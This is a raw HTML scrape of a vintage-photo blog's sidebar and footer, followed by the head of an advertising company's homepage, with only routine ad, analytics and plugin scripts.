id="sidebars" class="g"> <div class="sidebar"> <ul class="sidebar_list"> <li id="custom_html-8" class="widget_text widget widget-sidebar widget_custom_html"><div class="widget-wrap"><h3>Search for more</h3></div><div class="textwidget custom-html-widget"><script> (function() { var cx = 'partner-pub-9853500171810315:9069459321'; var gcse = document.createElement('script'); gcse.type = 'text/javascript'; gcse.async = true; gcse.src = 'https://cse.google.com/cse.js?cx=' + cx; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(gcse, s); })(); </script> <gcse:searchbox-only></gcse:searchbox-only></div></li> <li id="tab-3" class="widget widget-sidebar widget_tab"> <div id="tabber"> <ul class="tabs"> <li><a href="#popular-posts">Popular Posts</a></li> <li class="tab-recent-posts"><a href="#recent-posts">Recent Posts</a></li> </ul> <!--end .tabs--> <div class="clear"></div> <div class="inside"> <div id="popular-posts"> <ul> <li> <a title="bandits roost campground, 59½ Mulberry Street" href="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/"> <div class="left"> <img width="65" height="50" src="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?w=614 614w, https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=300%2C235 300w, https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=65%2C50 65w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16439" data-permalink="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/three-children-sleeping-in-a-dirty-alley/" data-orig-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" data-orig-size="614,480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;\u00a9 Bettmann\/CORBIS&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;ca. 1890s, Lower East Side, Manhattan, New York, New York, USA --- Three Children Sleeping in a Dirty Alley --- Image by \u00a9 Bettmann\/CORBIS&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;\u00a9 Corbis. All Rights Reserved.&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;Three Children Sleeping in a Dirty Alley&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Three Children Sleeping in a Dirty Alley" data-image-description="" data-medium-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=300%2C235" data-large-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" /> <div class="clear"></div> </div> <p class="entry-title">bandits roost campground, 59½ Mulberry Street</p> </a> <div class="clear"></div> </li> <li> <a title="Baby Rockers (10 photos)" href="http://oldpicsarchive.online/2017/01/06/baby-rockers-10-photos/"> <div class="left"> <img width="65" height="50" src="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?w=260 260w, https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?resize=65%2C50 65w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16290" data-permalink="http://oldpicsarchive.online/2017/01/06/baby-rockers-10-photos/baby/" data-orig-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?fit=260%2C194" data-orig-size="260,194" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="baby" data-image-description="" data-medium-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?fit=260%2C194" data-large-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2017/01/baby.jpg?fit=260%2C194" /> <div class="clear"></div> </div> <p class="entry-title">Baby Rockers (10 photos)</p> </a> <div class="clear"></div> </li> <li> <a title="Rare Colour Photographs Of Nazi Germany Official Ceremonies (20 photos)" href="http://oldpicsarchive.online/2017/01/06/rare-colour-photographs-of-nazi-germany-official-ceremonies-20-photos/"> <div class="left"> <div class="clear"></div> </div> <p class="entry-title">Rare Colour Photographs Of Nazi Germany Official Ceremonies (20 photos)</p> </a> <div class="clear"></div> </li> <li> <a title="Photos of Famous Models When They Were Kids (12 photos)" href="http://oldpicsarchive.online/2017/01/06/photos-of-famous-models-when-they-were-kids-12-photos/"> <div class="left"> <div class="clear"></div> </div> <p class="entry-title">Photos of Famous Models When They Were Kids (12 photos)</p> </a> <div class="clear"></div> </li> <li> <a title="Funny Vintage Food Ads (15 pics)" href="http://oldpicsarchive.online/2017/01/07/funny-vintage-food-ads-15-pics/"> <div class="left"> <div class="clear"></div> </div> <p class="entry-title">Funny Vintage Food Ads (15 pics)</p> </a> <div class="clear"></div> </li> </ul> </div> <!--end #popular-posts--> <div id="recent-posts"> <ul> <li> <a title="bandits roost campground, 59½ Mulberry Street" href="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/"> <div class="left"> <img width="65" height="50" src="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?w=614 614w, https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=300%2C235 300w, https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=65%2C50 65w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16439" data-permalink="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/three-children-sleeping-in-a-dirty-alley/" data-orig-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" data-orig-size="614,480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;\u00a9 Bettmann\/CORBIS&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;ca. 1890s, Lower East Side, Manhattan, New York, New York, USA --- Three Children Sleeping in a Dirty Alley --- Image by \u00a9 Bettmann\/CORBIS&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;\u00a9 Corbis. All Rights Reserved.&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;Three Children Sleeping in a Dirty Alley&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Three Children Sleeping in a Dirty Alley" data-image-description="" data-medium-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=300%2C235" data-large-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" /> <div class="clear"></div> </div> <p class="entry-title">bandits roost campground, 59½ Mulberry Street</p> </a> <div class="clear"></div> </li> <li> <a title="Arthur Miller&#8217;s &#038; Marilyn Monroe" href="http://oldpicsarchive.online/2019/05/11/arthur-millers-marilyn-monroe/"> <div class="left"> <img width="65" height="50" src="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?zoom=2&amp;resize=65%2C50 130w, https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?zoom=3&amp;resize=65%2C50 195w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16430" data-permalink="http://oldpicsarchive.online/2019/05/11/arthur-millers-marilyn-monroe/108462044_o/" data-orig-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=350%2C226" data-orig-size="350,226" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="108462044_o" data-image-description="" data-medium-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=300%2C194" data-large-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=350%2C226" /> <div class="clear"></div> </div> <p class="entry-title">Arthur Miller&#8217;s &#038; Marilyn Monroe</p> </a> <div class="clear"></div> </li> <li> <a title="Iconic Celebrity Portraits by Jim Marshall (42 photos)" href="http://oldpicsarchive.online/2019/05/08/iconic-celebrity-portraits-by-jim-marshall-42-photos-2/"> <div class="left"> <img width="65" height="50" src="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?zoom=2&amp;resize=65%2C50 130w, https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?zoom=3&amp;resize=65%2C50 195w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16203" data-permalink="http://oldpicsarchive.online/2017/10/04/iconic-celebrity-portraits-by-jim-marshall-42-photos/janis-joplin/" data-orig-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?fit=300%2C201" data-orig-size="300,201" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Janis-Joplin" data-image-description="" data-medium-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?fit=300%2C201" data-large-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2017/10/Janis-Joplin-e1557330983673.jpg?fit=1024%2C685" /> <div class="clear"></div> </div> <p class="entry-title">Iconic Celebrity Portraits by Jim Marshall (42 photos)</p> </a> <div class="clear"></div> </li> <li> <a title="best colorized historical photos (22 pics)" href="http://oldpicsarchive.online/2019/05/07/best-colorized-historical-photos-22-pics/"> <div class="left"> <img width="65" height="50" src="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?resize=201%2C150 201w, https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?resize=65%2C50 65w, https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?zoom=2&amp;resize=65%2C50 130w" sizes="(max-width: 65px) 100vw, 65px" data-attachment-id="16410" data-permalink="http://oldpicsarchive.online/2019/05/07/best-colorized-historical-photos-22-pics/profol/" data-orig-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?fit=201%2C250" data-orig-size="201,250" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="profol" data-image-description="" data-medium-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?fit=201%2C250" data-large-file="https://i0.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/profol.jpg?fit=201%2C250" /> <div class="clear"></div> </div> <p class="entry-title">best colorized historical photos (22 pics)</p> </a> <div class="clear"></div> </li> <li> <a title="Best Photo colorization by Sanna Dullaway" href="http://oldpicsarchive.online/2019/05/06/best-photo-colorization-by-sanna-dullaway/"> <div class="left"> <img width="65" height="50" src="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/1943_unknown_warsaw-color-e1557166028723.jpg?resize=65%2C50" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" data-attachment-id="16383" data-permalink="http://oldpicsarchive.online/2019/05/06/best-photo-colorization-by-sanna-dullaway/1943_unknown_warsaw-color/" data-orig-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/1943_unknown_warsaw-color-e1557166028723.jpg?fit=787%2C559" data-orig-size="787,559" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="1943_unknown_warsaw-color" data-image-description="" data-medium-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/1943_unknown_warsaw-color-e1557166028723.jpg?fit=300%2C213" data-large-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/1943_unknown_warsaw-color-e1557166028723.jpg?fit=787%2C559" /> <div class="clear"></div> </div> <p class="entry-title">Best Photo colorization by Sanna Dullaway</p> </a> <div class="clear"></div> </li> </ul> </div> <!--end #recent-posts--> <div class="clear"></div> </div> <!--end .inside --> <div class="clear"></div> </div><!--end #tabber --> </li> <li id="custom_html-3" class="widget_text widget widget-sidebar widget_custom_html"><div class="textwidget custom-html-widget"></div></li><li id="custom_html-4" class="widget_text widget widget-sidebar widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- hiji --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9853500171810315" data-ad-slot="6858573460" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></li><li id="custom_html-5" class="widget_text widget widget-sidebar widget_custom_html"><div class="textwidget custom-html-widget"><a href="//www.semrush.com/sem/?ref=5381862561&refer_source=nyobian&utm_source=berush&utm_medium=promo&utm_campaign=banner" title="SEMrush" target="_blank" rel="noopener noreferrer"><img src="https://t.myvisualiq.net/impression_pixel?r=000&et=i&ago=212&ao=882&aca=affiliate_link&si=affiliate_site&ci=banner&pi=&ad=-4&advt=5381862561&chnl=-4&vndr=1316&sz=9323&u=250x250-orange-en&pt=i"><img src="https://tapestry.tapad.com/tapestry/1?ta_partner_id=950&ta_redirect=https%3A%2F%2Ft.myvisualiq.net%2Fsync%3Fprid%3D1001%26ao%3D0%26pruuid%3DTAPAD_%24%7BIDS%3Akey%7D"><img src="https://i2.wp.com/www.berush.com/static/berush/banners/orange/250x250/250x250_en.png?w=1060" alt="SEMrush" data-recalc-dims="1" /></a></div></li> </ul> </div> </div><!--sidebars--> </aside> </div><!--#page--> </div><!--.main-container--> <footer> <div class="container"> <div class="footer-widgets"> <div class="f-widget f-widget-1"> </div> <div class="f-widget f-widget-2"> <div id="custom_html-7" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "https://www.berush.com/static/webpack_bundles/remote.js"; fjs.parentNode.insertBefore(js, fjs); }(document, "script", "berush-widget"));</script><div><div class="berush-root" data-ref="5381862561" data-ref_source="" data-db="us" data-color="blue"></div></div></div></div> </div> <div class="f-widget f-widget-3 last"> </div> </div><!--.footer-widgets--> </div><!--.container--> <div class="copyrights"> <!--start copyrights--> <div class="row" id="copyright-note"> <span><a href="http://oldpicsarchive.online/" title="Historical and Vintage Photography" >Old Pics Archives</a> Copyright &copy; 2019.</span> <div class="top">hahwelah@</div> </div> <!--end copyrights--> </div> </footer><!--footer--> <!--start footer code--> <script type="text/javascript"> var uid = '234503'; var wid = '491724'; </script> <script type="text/javascript" src="//cdn.popcash.net/pop.js"></script><!--end footer code--> <div style="display:none"> </div> <script> jQuery(document).ready(function () { jQuery.post('http://oldpicsarchive.online?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var s = document.createElement("script"); s.type = "text/javascript"; s.innerHTML = response; jQuery("head").append(s); }); }); </script><script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/oldpicsarchive.online\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/modules/wpgroho.js'></script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver=3.2.22'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"http:\/\/oldpicsarchive.online\/wp-admin\/admin-ajax.php","nonce":"572d8bd378","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/oldpicsarchive.online\/wp-login.php?redirect_to=http%3A%2F%2Foldpicsarchive.online%2F2019%2F05%2F14%2Fbandits-roost-campground-59%25c2%25bd-mulberry-street%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/themes/pinstagram/js/modernizr.min.js?ver=2.8.3'></script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/themes/pinstagram/js/sticky.js?ver=5.2'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'161875667',post:'0',tz:'0',srv:'oldpicsarchive.online'} ]); _stq.push([ 'clickTrackerInit', '161875667', '0' ]); </script> </div><!--.main-container-wrap--> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width"/> <meta name="p:domain_verify" content="6b824491edb59cbadc07439ed9f004f7"/> <title>Improve Digital - For Transparency. For Revenue. For Content Providers.</title> <link rel="profile" href="http://gmpg.org/xfn/11"/> <link rel="pingback" href="https://www.improvedigital.com/main/xmlrpc.php"/> <link rel="shortcut icon" href="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/favicon.ico"/> <link rel="icon" type="image/png" href="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/favicon.ico"/> <link rel="apple-touch-icon" href="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/favicon.ico"/> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link href="https://fonts.googleapis.com/css?family=Caveat" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" rel="stylesheet"> <!-- Hotjar Tracking Code for https://www.improvedigital.com/ --> <script>(function(h,o,t,j,a,r){h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};h._hjSettings={hjid:837807,hjsv:6};a=o.getElementsByTagName('head')[0];r=o.createElement('script');r.async=1;r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;a.appendChild(r);})(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');</script> <script id="mcjs">!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/6e6b0b58f4d4b5655bb8316d2/1164d9675b25dc08bfabbda7c.js");</script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-N7SDJRM');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N7SDJRM" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <link rel="alternate" hreflang="en-US" href="https://www.improvedigital.com/"/> <!-- This site is optimized with the Yoast SEO plugin v9.6 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Improve Digital is the All-in-One Advertising Platform for Publishers, Content Providers and Broadcasters."/> <link rel="canonical" href="https://www.improvedigital.com/"/> <link rel="next" href="https://www.improvedigital.com/page/2/"/> <meta property="og:locale" content="en_US"/> <meta property="og:type" content="website"/> <meta property="og:title" content="Improve Digital"/> <meta property="og:description" content="All-in-One Advertising Platform for Publishers"/> <meta property="og:url" content="https://www.improvedigital.com/"/> <meta property="og:site_name" content="Improve Digital"/> <meta property="og:image" content="https://www.improvedigital.com/main/wp-content/uploads/2015/04/profile_pic.png"/> <meta property="og:image:secure_url" content="https://www.improvedigital.com/main/wp-content/uploads/2015/04/profile_pic.png"/> <meta property="og:image:width" content="500"/> <meta property="og:image:height" content="500"/> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.improvedigital.com/#website","url":"https://www.improvedigital.com/","name":"Improve Digital","potentialAction":{"@type":"SearchAction","target":"https://www.improvedigital.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.improvedigital.com/","sameAs":["https://www.facebook.com/pages/Improve-Digital/104794536277798","https://www.linkedin.com/company/improve-digital","https://www.youtube.com/channel/UCjYORqfz7i1ae3OsCgpoj2A","https://twitter.com/ImproveDigital"],"@id":"https://www.improvedigital.com/#organization","name":"Improve Digital","logo":"http://www.improvedigital.com/main/wp-content/uploads/2015/04/profile_pic.png"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform.twitter.com'/> <link rel='dns-prefetch' href='//maps.googleapis.com'/> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com'/> <link rel='dns-prefetch' href='//s.w.org'/> <link rel="alternate" type="application/rss+xml" title="Improve Digital &raquo; Feed" href="https://www.improvedigital.com/feed/"/> <link rel="alternate" type="application/rss+xml" title="Improve Digital &raquo; Comments Feed" href="https://www.improvedigital.com/comments/feed/"/> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.4.2 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false">var mi_version='7.4.2';var mi_track_user=true;var mi_no_track_reason='';var disableStr='ga-disable-UA-40697938-1';function __gaTrackerIsOptedOut(){return document.cookie.indexOf(disableStr+'=true')>-1;}if(__gaTrackerIsOptedOut()){window[disableStr]=true;}function __gaTrackerOptout(){document.cookie=disableStr+'=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';window[disableStr]=true;}if(mi_track_user){(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');__gaTracker('create','UA-40697938-1','auto');__gaTracker('set','forceSSL',true);__gaTracker('require','GTM-NT3WPQD');__gaTracker('require','linkid','linkid.js');__gaTracker('send','pageview');}else{console.log("");(function(){var noopfn=function(){return null;};var noopnullfn=function(){return null;};var Tracker=function(){return null;};var p=Tracker.prototype;p.get=noopfn;p.set=noopfn;p.send=noopfn;var __gaTracker=function(){var len=arguments.length;if(len===0){return;}var f=arguments[len-1];if(typeof f!=='object'||f===null||typeof f.hitCallback!=='function'){console.log('Not running function __gaTracker('+arguments[0]+" ....) because you are not being tracked. "+mi_no_track_reason);return;}try{f.hitCallback();}catch(ex){}};__gaTracker.create=function(){return new Tracker();};__gaTracker.getByName=noopnullfn;__gaTracker.getAll=function(){return[];};__gaTracker.remove=noopfn;window['__gaTracker']=__gaTracker;})();}</script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript">window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.improvedigital.com\/main\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px 